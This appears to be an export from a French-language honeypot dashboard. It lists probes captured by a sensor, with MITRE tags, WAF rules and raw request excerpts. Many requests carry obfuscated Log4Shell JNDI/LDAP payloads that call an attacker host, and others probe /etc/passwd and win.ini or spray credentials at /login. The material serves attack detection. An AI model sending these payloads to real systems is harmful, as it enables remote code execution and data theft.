/${${vsn4:lx:-j}${r21:-n}${n:-d}${8l:wik:l58:-i}${gx7w:i6c4:yx:-:}${s:5:-l}${sa8u:wlr7:-d}${qzx:-a}${7:jgqc:-p}${5nt:o7s:-:}${l:-/}${3:-/}${y:zpv3:4t7:-P}${o1p:n:-A}${hfog:1fgv:2y7u:-l}${r4:-0}${p1u:gurs:g:-c}${2:--}${${30z:-s}${7jz4:u:y:-y}${pfs:ilm:l:-s}${p:a92:e:-:}${gcmx:-j}${85o:h:-a}${no:-v}${ui:412:ceg8:-a}${fo0:3qne:179d:-.}${t:4:-v}${d1m2:vr6e:1h9:-e}${9:1v:-r}${579j:t7:-s}${rq:v0:-i}${xvnk:6t1:-o}${l:te4x:dt9p:-n}}${xu:-.}${8r:2jeg:-e}${9:-7}${dljk:0dzt:djt:-d}${9jlb:-b}${7k:-8}${iba:znam:m8:-c}${
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8085
Chemin / cible
/${${vsn4:lx:-j}${r21:-n}${n:-d}${8l:wik:l58:-i}${gx7w:i6c4:yx:-:}${s:5:-l}${sa8u:wlr7:-d}${qzx:-a}${7:jgqc:-p}${5nt:o7s:-:}${l:-/}${3:-/}${y:zpv3:4t7:-P}${o1p…
Preuve honeypot — Sonde port 8085/TCP
Connexion détectée sur le port 8085 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8085_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 61
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${drb:-j}${1ze:-n}${4b3:-d}${c:jvy:-i}${k:-:}${u2m7:4:-l}${0r:62e:6uwj:-d}${1jgx:i:-a}${djx5:-p}${p:-:}${jqo:2:-/}${t:7o:-/}${96e:-U}${g:4:j4:-A}${m:zfh:e:-l}${xap4:30a:9:-0}${v4bf:vh:684u:-c}${skf…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${vsn4:lx:-j}${r21:-n}${n:-d}${8l:wik:l58:-i}${gx7w:i6c4:yx:-:}${s:5:-l}${sa8u:wlr7:-d}${qzx:-a}${7:jgqc:-p}${5nt:o7s:-:}
Requête brute (extrait)
GET /${${vsn4:lx:-j}${r21:-n}${n:-d}${8l:wik:l58:-i}${gx7w:i6c4:yx:-:}${s:5:-l}${sa8u:wlr7:-d}${qzx:-a}${7:jgqc:-p}${5nt:o7s:-:}${l:-/}${3:-/}${y:zpv3:4t7:-P}${o1p:n:-A}${hfog:1fgv:2y7u:-l}${r4:-0}${p1u:gurs:g:-c}${2:--}${${30z:-s}${7jz4:u:y:-y}${pfs:ilm:l
|
|||||||
| TCP | 8085 · HTTP | http | Sonde port 8085/TCP port 8085 tcp · via HTTP:8085 · (sonde / probe) · → /${${lzt:rs0:i:-j}${3kb8:2kvz:r:-n}${tu:2s:ko3:… | Élevée | Moyen · 61 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${lzt:rs0:i:-j}${3kb8:2kvz:r:-n}${tu:2s:ko3:-d}${n:v:-i}${1v2:d12:i97y:-:}${k:u:v:-l}${5:-d}${pj… UA ${${jb:-j}${2:5d:ew:-n}${h7:r70z:-d}${nhup:-i}${t92:-:}${z:j0:y…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${lzt:rs0:i:-j}${3kb8:2kvz:r:-n}${tu:2s:ko3:-d}${n:v:-i}${1v2:d12:i97y:-:}${k:u:v:-l}${5:-d}${pjsw:imx:9pl:-a}${cj:-p}${7msn:-:}${2a:a2s0:zeju:-/}${5rq:-/}${w7:aoi6:q0xg:-P}${asq3:x:-A}${5h:05:7pr0:-l}${jgw:-0}${vxl:rt:ruo:-c}${04kt:5au8:lh:--}${${3l:-s}${n:k:-y}${oduv:5:l8:-s}${kvn:-:}${jen:q:fe6y:-j}${f9:e:5t:-a}${ox:nu:-v}${now9:vj:xb:-a}${t:o:-.}${n:b1:x:-v}${m:lk:-e}${n1kr:m:afj:-r}${icy:m9lp:5x:-s}${px:930e:-i}${a:-o}${n:-n}}${6h:-.}${nd:g:z:-e}${74:07g:-7}${tw:-d}${j8wo:zhc5:-b}${f7io:jzdm:-8}${5z
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8085
Chemin / cible
/${${lzt:rs0:i:-j}${3kb8:2kvz:r:-n}${tu:2s:ko3:-d}${n:v:-i}${1v2:d12:i97y:-:}${k:u:v:-l}${5:-d}${pjsw:imx:9pl:-a}${cj:-p}${7msn:-:}${2a:a2s0:zeju:-/}${5rq:-/}$…
Preuve honeypot — Sonde port 8085/TCP
Connexion détectée sur le port 8085 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8085_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 61
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${jb:-j}${2:5d:ew:-n}${h7:r70z:-d}${nhup:-i}${t92:-:}${z:j0:y:-l}${5l:f:-d}${kvmu:luqr:8o6e:-a}${096:0k:-p}${0q:0:bm87:-:}${vx5:o2yd:-/}${9bh:75:-/}${ols:i9:-U}${0:ievg:rl:-A}${5s1k:y:gqk:-l}${t630…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${lzt:rs0:i:-j}${3kb8:2kvz:r:-n}${tu:2s:ko3:-d}${n:v:-i}${1v2:d12:i97y:-:}${k:u:v:-l}${5:-d}${pjsw:imx:9pl:-a}${cj:-p}${7
Requête brute (extrait)
GET /${${lzt:rs0:i:-j}${3kb8:2kvz:r:-n}${tu:2s:ko3:-d}${n:v:-i}${1v2:d12:i97y:-:}${k:u:v:-l}${5:-d}${pjsw:imx:9pl:-a}${cj:-p}${7msn:-:}${2a:a2s0:zeju:-/}${5rq:-/}${w7:aoi6:q0xg:-P}${asq3:x:-A}${5h:05:7pr0:-l}${jgw:-0}${vxl:rt:ruo:-c}${04kt:5au8:lh:--}${${3
|
|||||||
| TCP | 8085 · HTTP | http | Sonde port 8085/TCP port 8085 tcp · via HTTP:8085 · (sonde / probe) | Élevée | Moyen · 48 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
POST / UA ${${0gb:u4im:u:-j}${kq2o:23p:4:-n}${kbj:-d}${ea0i:6xk0:-i}${12:…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8085
Chemin / cible
/
Preuve honeypot — Sonde port 8085/TCP
Connexion détectée sur le port 8085 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8085_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 48
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${0gb:u4im:u:-j}${kq2o:23p:4:-n}${kbj:-d}${ea0i:6xk0:-i}${12:ru:-:}${9gxp:kjl7:4wub:-l}${2j:wxt:es:-d}${f:g:-a}${facr:-p}${9f:5t:-:}${1n:-/}${ax:-/}${n0th:oa5:9r6o:-U}${rc3f:7c:ali:-A}${4c:2hfv:q2:…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1
Host: 62.3.50.33:8085
Accept: */*
User-Agent: ${${0gb:u4im:u:-j}${kq2o:23p:4:-n}${kbj:-d}${ea0i:6xk0:-i}${12:
Requête brute (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:8085 Accept: */* User-Agent: ${${0gb:u4im:u:-j}${kq2o:23p:4:-n}${kbj:-d}${ea0i:6xk0:-i}${12:ru:-:}${9gxp:kjl7:4wub:-l}${2j:wxt:es:-d}${f:g:-a}${facr:-p}${9f:5t:-:}${1n:-/}${ax:-/}${n0th:oa5:9r6o:-U}${rc3f:7c:ali:-A}${4c:
|
|||||||
| TCP | 8085 · HTTP | http | Sonde port 8085/TCP port 8085 tcp · via HTTP:8085 · (sonde / probe) | Élevée | Moyen · 50 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8085
Chemin / cible
/
Preuve honeypot — Sonde port 8085/TCP
Connexion détectée sur le port 8085 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8085_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 50
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8085 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8085 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 X-Forwarded-For: ${${t:5ay:6:-j}${ur5g:c:y7m:-n}${zfl7:39ce:8:-d}${ia4:4:
|
|||||||
| TCP | 8085 · HTTP | http | Sonde port 8085/TCP port 8085 tcp · via HTTP:8085 · (sonde / probe) | Élevée | Moyen · 48 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA ${${o4:-j}${cmap:i63:-n}${j:zk:ecp:-d}${c:bx2f:-i}${y:ueip:-:}$…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8085
Chemin / cible
/
Preuve honeypot — Sonde port 8085/TCP
Connexion détectée sur le port 8085 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8085_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 48
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${o4:-j}${cmap:i63:-n}${j:zk:ecp:-d}${c:bx2f:-i}${y:ueip:-:}${s:-l}${h8ex:-d}${1:-a}${hey:-p}${9a8:-:}${cmv1:a:ke8q:-/}${s2:-/}${m:j4:-U}${d:4rk:-A}${xf:eu7:-l}${ij9:80h:8:-0}${l:-c}${y178:fexi:--}…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1
Host: 62.3.50.33:8085
Accept: */*
User-Agent: ${${o4:-j}${cmap:i63:-n}${j:zk:ecp:-d}${c:bx2f:-i}${y:ueip:-:}${
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8085 Accept: */* User-Agent: ${${o4:-j}${cmap:i63:-n}${j:zk:ecp:-d}${c:bx2f:-i}${y:ueip:-:}${s:-l}${h8ex:-d}${1:-a}${hey:-p}${9a8:-:}${cmv1:a:ke8q:-/}${s2:-/}${m:j4:-U}${d:4rk:-A}${xf:eu7:-l}${ij9:80h:8:-0}${l:-c}${y178:f
|
|||||||
| TCP | 8060 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8060 · (tentative d'exploit) · → /etc/passwd | Élevée | Élevé · 66 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /etc/passwd UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8060
Chemin / cible
/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 66
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
pat-0716
pat-0802
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
MITRE T1083 file enum
SSRF Any-address SSRF
LFI path /etc/passwd
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /etc/passwd HTTP/1.1 Host: 62.3.50.33:8060 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleW
Requête brute (extrait)
GET /etc/passwd HTTP/1.1 Host: 62.3.50.33:8060 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8060 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8060 · (tentative d'exploit) · → /Windows/win.ini | Élevée | Élevé · 66 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /Windows/win.ini UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8060
Chemin / cible
/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 66
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0715
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /Windows/win.ini HTTP/1.1 Host: 62.3.50.33:8060 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) A
Requête brute (extrait)
GET /Windows/win.ini HTTP/1.1 Host: 62.3.50.33:8060 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8005 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:8005 · (sonde / probe) · → /login | Élevée | Élevé · 68 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
33
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8005
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 68
Confiance : Confiance 100 % — 5 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
rce-14
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8005 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Int
Requête brute (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8005 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/json Cont |
|||||||
| TCP | 8005 · HTTP | http | Sonde port 8005/TCP port 8005 tcp · via HTTP:8005 · (sonde / probe) · → /${${i:o:-j}${dc91:vxnf:ei:-n}${j58:pxc:-d}${35… | Élevée | Moyen · 58 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
PUT /${${i:o:-j}${dc91:vxnf:ei:-n}${j58:pxc:-d}${35c:39:ute:-i}${jr1:btxq:q2o:-:}${y:wv:-l}${6y:-d}${bx… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
PUT
/${${i:o:-j}${dc91:vxnf:ei:-n}${j58:pxc:-d}${35c:39:ute:-i}${jr1:btxq:q2o:-:}${y:wv:-l}${6y:-d}${bxw9:-a}${k:-p}${7ib:y:-:}${tg:ec:w0:-/}${e:db6x:-/}${kd:al:il:-P}${fwhy:r6z4:-A}${bp:b5ig:-l}${8:6:o3c:-0}${v3g:c:dm9:-c}${j:--}${${fp17:36b:sinu:-s}${z:-y}${7d:4ylc:-s}${n948:zv6:-:}${bc:-j}${hu4:cq:-a}${o4:8a9w:-v}${bd2m:-a}${koge:jiu:wgk:-.}${qc:fg:-v}${ygn:qdo:-e}${7:bh:o:-r}${pdfi:kw:s1wa:-s}${uito:jq4x:va:-i}${9532:-o}${dow0:-n}}${09z:-.}${4jfp:6rs:-f}${kub:jco:4a:-0}${umtp:8aw:-5}${n:-c}${uk1i:plw:-3}${f
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
PUT
Port
8005
Chemin / cible
/${${i:o:-j}${dc91:vxnf:ei:-n}${j58:pxc:-d}${35c:39:ute:-i}${jr1:btxq:q2o:-:}${y:wv:-l}${6y:-d}${bxw9:-a}${k:-p}${7ib:y:-:}${tg:ec:w0:-/}${e:db6x:-/}${kd:al:il…
Preuve honeypot — Sonde port 8005/TCP
Connexion détectée sur le port 8005 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8005_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 58
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
PUT /${${i:o:-j}${dc91:vxnf:ei:-n}${j58:pxc:-d}${35c:39:ute:-i}${jr1:btxq:q2o:-:}${y:wv:-l}${6y:-d}${bxw9:-a}${k:-p}${7ib:y:-:}$
Requête brute (extrait)
PUT /${${i:o:-j}${dc91:vxnf:ei:-n}${j58:pxc:-d}${35c:39:ute:-i}${jr1:btxq:q2o:-:}${y:wv:-l}${6y:-d}${bxw9:-a}${k:-p}${7ib:y:-:}${tg:ec:w0:-/}${e:db6x:-/}${kd:al:il:-P}${fwhy:r6z4:-A}${bp:b5ig:-l}${8:6:o3c:-0}${v3g:c:dm9:-c}${j:--}${${fp17:36b:sinu:-s}${z:-
|
|||||||
| TCP | 8005 · HTTP | http | Sonde port 8005/TCP port 8005 tcp · via HTTP:8005 · (sonde / probe) · → /${${cp:7r8:-j}${3:i0ou:2:-n}${r:-d}${9:wd:-i}$… | Élevée | Moyen · 58 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${cp:7r8:-j}${3:i0ou:2:-n}${r:-d}${9:wd:-i}${yr9:-:}${nt:-l}${vzr:f0w4:917:-d}${r:5je9:p1d:-a}${… UA ${${w5k:693m:6nj:-j}${g:g:l8o:-n}${bru:-d}${sr2:-i}${q7pw:-:}${…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${cp:7r8:-j}${3:i0ou:2:-n}${r:-d}${9:wd:-i}${yr9:-:}${nt:-l}${vzr:f0w4:917:-d}${r:5je9:p1d:-a}${e:6n8:-p}${cm:-:}${q7d:i12:-/}${bgut:rej:79:-/}${i3zt:pe16:2r:-P}${b782:x:-A}${f9no:-l}${i1o3:-0}${x03:ykte:-c}${1t:--}${${cum4:t9:9:-s}${oz2:nvjt:-y}${s:-s}${i:g:mjw:-:}${r3g9:g:fuw6:-j}${ravp:zhc:ami:-a}${ku:-v}${rev:-a}${uy:16fg:-.}${au:-v}${b76k:d2:-e}${l:-r}${yv0:-s}${62q:tbfj:p:-i}${2j:y0n:cpw:-o}${5:-n}}${rx3q:y:-.}${j:-f}${2x:9o4u:-0}${al:1l:-5}${l:1lw8:-c}${t3l:2ncx:-3}${2ch:-e}${ifa:n7jl:-4}${zo:xv:-
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8005
Chemin / cible
/${${cp:7r8:-j}${3:i0ou:2:-n}${r:-d}${9:wd:-i}${yr9:-:}${nt:-l}${vzr:f0w4:917:-d}${r:5je9:p1d:-a}${e:6n8:-p}${cm:-:}${q7d:i12:-/}${bgut:rej:79:-/}${i3zt:pe16:2…
Preuve honeypot — Sonde port 8005/TCP
Connexion détectée sur le port 8005 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8005_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 58
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${w5k:693m:6nj:-j}${g:g:l8o:-n}${bru:-d}${sr2:-i}${q7pw:-:}${1xd:r:-l}${m:-d}${5fr:-a}${lh:0o:-p}${w:6fvd:eh:-:}${6xcf:-/}${6o3z:z:-/}${qt1u:mrky:v:-U}${dr:0:-A}${iwa:l:2v6:-l}${r0dp:-0}${kr:9:-c}$…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${cp:7r8:-j}${3:i0ou:2:-n}${r:-d}${9:wd:-i}${yr9:-:}${nt:-l}${vzr:f0w4:917:-d}${r:5je9:p1d:-a}${e:6n8:-p}${cm:-:}${q7d:i1
Requête brute (extrait)
GET /${${cp:7r8:-j}${3:i0ou:2:-n}${r:-d}${9:wd:-i}${yr9:-:}${nt:-l}${vzr:f0w4:917:-d}${r:5je9:p1d:-a}${e:6n8:-p}${cm:-:}${q7d:i12:-/}${bgut:rej:79:-/}${i3zt:pe16:2r:-P}${b782:x:-A}${f9no:-l}${i1o3:-0}${x03:ykte:-c}${1t:--}${${cum4:t9:9:-s}${oz2:nvjt:-y}${s
|
|||||||
| TCP | 8005 · HTTP ALT 8005 | http-alt-8005 | Injection PHP php injection · via HTTP ALT 8005:8005 · (tentative d'exploit) | Faible | Moyen · 52 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
Émulateur
HTTP-ALT-8005
WAF
—
Recommandation
Investiguer
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
8005
Chemin / cible
—
Service
HTTP ALT 8005
Payload
ZSDLKFJ2 /${${atw:hqb:r:-j}${1:jvdm:-n}${k:nq:m0ge:-d}${9wbk:wj:-i}${ae:-:}${73qw:d:-l}${emvt:-d}${r05z:b:-a}${hb8y:34:5:-p}${8:
Pourquoi cette classification : Type « php_injection » (signaux protocolaires) · confiance 97%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 52
Confiance : Confiance 97 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
ZSDLKFJ2 /${${atw:hqb:r:-j}${1:jvdm:-n}${k:nq:m0ge:-d}${9wbk:wj:-i}${ae:-:}${73qw:d:-l}${emvt:-d}${r05z:b:-a}${hb8y:34:5:-p}${8:
Requête brute (extrait)
ZSDLKFJ2 /${${atw:hqb:r:-j}${1:jvdm:-n}${k:nq:m0ge:-d}${9wbk:wj:-i}${ae:-:}${73qw:d:-l}${emvt:-d}${r05z:b:-a}${hb8y:34:5:-p}${8:-:}${vls:ek:8xq4:-/}${m9p:ph:w:-/}${6:7o:-P}${qux:g5n:-A}${j:qfwv:78h:-l}${f:dli:-0}${0du9:z4yf:dcb4:-c}${8lc:dvmu:w2:--}${${g7a
|
|||||||
| TCP | 8005 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:8005 · (sonde / probe) · → /login | Élevée | Élevé · 68 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8005
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 68
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8005 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Int
Requête brute (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8005 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Length: 2869 Content-Type: |
|||||||
